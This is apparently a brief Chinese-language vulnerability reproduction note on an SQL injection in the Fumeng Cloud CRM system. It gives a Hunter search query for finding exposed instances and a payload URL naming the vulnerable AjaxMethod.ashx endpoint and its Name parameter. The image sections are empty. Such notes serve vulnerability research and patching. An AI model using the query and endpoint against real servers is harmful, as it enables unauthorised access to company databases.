F10-1孚盟云-CRM系统-SQL

漏洞描述：

孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品，让用户可以用云模式实现信息化管理，让用户的异地办公更加流畅，大大降低中小企业在信息化上成本，用最小的投入享受大型企业级别的信息化服务，使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。

网站图片:

网络测绘:

Hunter 语法:

hunterapp.name=“孚盟云 CRM”

漏洞复现:

payload：

http://xx.xx.xx.xx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1

效果图: